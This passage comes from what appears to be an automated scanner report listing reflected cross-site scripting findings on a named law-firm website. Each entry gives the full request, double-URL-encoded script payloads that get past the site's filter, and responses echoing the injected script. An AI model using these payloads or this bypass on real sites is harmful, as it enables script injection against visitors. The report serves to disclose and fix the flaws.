There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js41fbd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3ba108ca8ed/ui.draggable.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js41fbd"><script>alert(1)</script>3ba108ca8ed/ui.draggable.js" value="">
...[SNIP]...

4.205. http://www.wileyrein.com/js/ui.draggable.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.draggable.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee808%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e982f7a16b81 was submitted in the REST URL parameter 2. This input was echoed as ee808"><script>alert(1)</script>982f7a16b81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/ui.draggable.jsee808%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e982f7a16b81 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/ui.draggable.jsee808"><script>alert(1)</script>982f7a16b81" value="">
...[SNIP]...

4.206. http://www.wileyrein.com/js/ui.resizable.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.resizable.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 159bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eff8afb5f36e was submitted in the REST URL parameter 1. This input was echoed as 159bb"><script>alert(1)</script>ff8afb5f36e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js159bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eff8afb5f36e/ui.resizable.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js159bb"><script>alert(1)</script>ff8afb5f36e/ui.resizable.js" value="">
...[SNIP]...

4.207. http://www.wileyrein.com/js/ui.resizable.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.resizable.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dd6d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea322173fb55 was submitted in the REST URL parameter 2. This input was echoed as 6dd6d"><script>alert(1)</script>a322173fb55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/ui.resizable.js6dd6d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea322173fb55 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/ui.resizable.js6dd6d"><script>alert(1)</script>a322173fb55" value="">
...[SNIP]...

4.208. http://www.wileyrein.com/rss/awards/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/awards/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4823f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74755294a4f was submitted in the REST URL parameter 1. This input was echoed as 4823f"><script>alert(1)</script>74755294a4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss4823f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74755294a4f/awards/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss4823f"><script>alert(1)</script>74755294a4f/awards/rss.xml" value="">
...[SNIP]...

4.209. http://www.wileyrein.com/rss/awards/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/awards/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ddba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb482c6d5ffe was submitted in the REST URL parameter 2. This input was echoed as 3ddba"><script>alert(1)</script>b482c6d5ffe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/awards3ddba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb482c6d5ffe/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/awards3ddba"><script>alert(1)</script>b482c6d5ffe/rss.xml" value="">
...[SNIP]...

4.210. http://www.wileyrein.com/rss/awards/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/awards/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4862c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e626bbbadd84 was submitted in the REST URL parameter 3. This input was echoed as 4862c"><script>alert(1)</script>626bbbadd84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/awards/rss.xml4862c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e626bbbadd84 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/awards/rss.xml4862c"><script>alert(1)</script>626bbbadd84" value="">
...[SNIP]...

4.211. http://www.wileyrein.com/rss/events/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/events/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96c9a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb17c06f0b56 was submitted in the REST URL parameter 1. This input was echoed as 96c9a"><script>alert(1)</script>b17c06f0b56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss96c9a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb17c06f0b56/events/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss96c9a"><script>alert(1)</script>b17c06f0b56/events/rss.xml" value="">
...[SNIP]...

4.212. http://www.wileyrein.com/rss/events/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/events/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d1d6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f934a0d192 was submitted in the REST URL parameter 2. This input was echoed as 8d1d6"><script>alert(1)</script>3f934a0d192 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/events8d1d6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f934a0d192/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/events8d1d6"><script>alert(1)</script>3f934a0d192/rss.xml" value="">
...[SNIP]...

4.213. http://www.wileyrein.com/rss/events/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/events/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ac25%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7c854d93a was submitted in the REST URL parameter 3. This input was echoed as 5ac25"><script>alert(1)</script>a7c854d93a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/events/rss.xml5ac25%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7c854d93a HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/events/rss.xml5ac25"><script>alert(1)</script>a7c854d93a" value="">
...[SNIP]...

4.214. http://www.wileyrein.com/rss/in_the_news/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/in_the_news/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cefc3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb60ad84eb9c was submitted in the REST URL parameter 1. This input was echoed as cefc3"><script>alert(1)</script>b60ad84eb9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rsscefc3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb60ad84eb9c/in_the_news/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rsscefc3"><script>alert(1)</script>b60ad84eb9c/in_the_news/rss.xml" value="">
...[SNIP]...

4.215. http://www.wileyrein.com/rss/in_the_news/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/in_the_news/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc00e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed760b3b5dd4 was submitted in the REST URL parameter 2. This input was echoed as cc00e"><script>alert(1)</script>d760b3b5dd4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/in_the_newscc00e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed760b3b5dd4/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/in_the_newscc00e"><script>alert(1)</script>d760b3b5dd4/rss.xml" value="">
...[SNIP]...

4.216. http://www.wileyrein.com/rss/in_the_news/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/in_the_news/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6f54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2151516518f was submitted in the REST URL parameter 3. This input was echoed as b6f54"><script>alert(1)</script>2151516518f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/in_the_news/rss.xmlb6f54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2151516518f HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/in_the_news/rss.xmlb6f54"><script>alert(1)</script>2151516518f" value="">
...[SNIP]...

4.217. http://www.wileyrein.com/rss/news_releases/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/news_releases/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9abb7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d2f01cf3f9 was submitted in the REST URL parameter 1. This input was echoed as 9abb7"><script>alert(1)</script>3d2f01cf3f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss9abb7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d2f01cf3f9/news_releases/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss9abb7"><script>alert(1)</script>3d2f01cf3f9/news_releases/rss.xml" value="">
...[SNIP]...

4.218. http://www.wileyrein.com/rss/news_releases/rss.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/news_releases/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc1d0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e98c2f7af3b5 was submitted in the REST URL parameter 2. This input was echoed as dc1d0"><script>alert(1)</script>98c2f7af3b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/news_releasesdc1d0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e98c2f7af3b5/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/news_releasesdc1d0"><script>alert(1)</script>98c2f7af3b5/rss.xml" value="">
...[SNIP]...

4.219. http://www.wileyrein.com/rss/news_releases/rss.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/news_releases/rss.xml

Issue detail

